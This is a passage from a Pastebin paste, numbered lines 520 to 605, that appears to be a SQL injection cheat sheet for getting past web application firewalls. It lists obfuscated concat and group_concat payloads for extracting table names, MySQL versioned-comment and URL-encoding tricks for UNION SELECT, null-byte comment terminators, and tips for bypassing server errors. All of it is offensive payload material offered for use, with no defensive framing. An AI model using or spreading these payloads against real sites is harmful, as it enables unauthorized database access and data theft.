  520. CoNcAt()
  521. concat()
  522. CON%08CAT()
  523. CoNcAt()
  524. %0AcOnCat()
  525. /**//*!12345cOnCat*/
  526. /*!50000cOnCat*/(/*!*/)
  527. unhex(hex(concat(table_name)))
  528. unhex(hex(/*!12345concat*/(table_name)))
  529. unhex(hex(/*!50000concat*/(table_name)))
  530. [~] group_concat() [~]
  531. /*!group_concat*/()
  532. gRoUp_cOnCAt()
  533. group_concat(/*!*/)
  534. group_concat(/*!12345table_name*/)
  535. group_concat(/*!50000table_name*/)
  536. /*!group_concat*/(/*!12345table_name*/)
  537. /*!group_concat*/(/*!50000table_name*/)
  538. /*!12345group_concat*/(/*!12345table_name*/)
  539. /*!50000group_concat*/(/*!50000table_name*/)
  540. /*!GrOuP_ConCaT*/()
  541. /*!12345GroUP_ConCat*/()
  542. /*!50000gRouP_cOnCaT*/()
  543. /*!50000Gr%6fuP_c%6fnCAT*/()
  544. unhex(hex(group_concat(table_name)))
  545. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  546. unhex(hex(/*!12345group_concat*/(table_name)))
  547. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
  548. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
  549. unhex(hex(/*!50000group_concat*/(table_name)))
  550. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
  551. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
  552. convert(group_concat(table_name)+using+ascii)
  553. convert(group_concat(/*!table_name*/)+using+ascii)
  554. convert(group_concat(/*!12345table_name*/)+using+ascii)
  555. convert(group_concat(/*!50000table_name*/)+using+ascii)
  556. CONVERT(group_concat(table_name)+USING+latin1)
  557. CONVERT(group_concat(table_name)+USING+latin2)
  558. CONVERT(group_concat(table_name)+USING+latin3)
  559. CONVERT(group_concat(table_name)+USING+latin4)
  560. CONVERT(group_concat(table_name)+USING+latin5)
  561. [~] after id no. like id=1 +/*!and*/+1=0 [~]
  562. +div+0
  563. Having+1=0
  564. +AND+1=0
  565. +/*!and*/+1=0
  566. and(1)=(0)
  567. when the --+- or -- dosen't work use ;%00
  568. bypass error 505
  569. sometimes when union select ,sites become 505 or time out....
  570. bypass-
  571. -use brackets
  572. union(select+1)
  573. -use %0b or /**/ as space
  574. union%0bselect
  575. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  576. /*!%55NiOn*/ /*!%53eLEct*/
  577. %55nion(%53elect 1,2,3)-- -
  578. +union+distinct+select+
  579. +union+distinctROW+select+
  580. /**//*!12345UNION SELECT*//**/
  581. /**//*!50000UNION SELECT*//**/
  582. /**/UNION/**//*!50000SELECT*//**/
  583. /*!50000UniON SeLeCt*/
  584. union /*!50000%53elect*/
  585. +#uNiOn+#sEleCt
  586. +#1q%0AuNiOn all#qa%0A#
  587. %0AsEleCt
  588. /*!%55NiOn*/ /*!%53eLEct*/
  589. /*!u%6eion*/ /*!se%6cect*/
  590. +un/**/ion+se/**/lect
  591. uni%0bon+se%0blect
  592. %2f**%2funion%2f**%2fselect
  593. union%23foo*%2F*bar%0D%0Aselect
  594. %23foo%0D%0A
  595. REVERSE(noinu)+REVERSE(tceles)
  596. /*--*/union/*--*/select/*--*/
  597. union (/*!/**/ SeleCT */ 1,2,3)
  598. /*!union*/+/*!select*/
  599. union+/*!select*/
  600. /**/union/**/select/**/
  601. /**/uNIon/**/sEleCt/**/
  602. /**//*!union*//**//*!select*//**/
  603. /*!uNIOn*/ /*!SelECt*/
  604. +union+distinct+select+
  605. +union+distinctROW+select+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!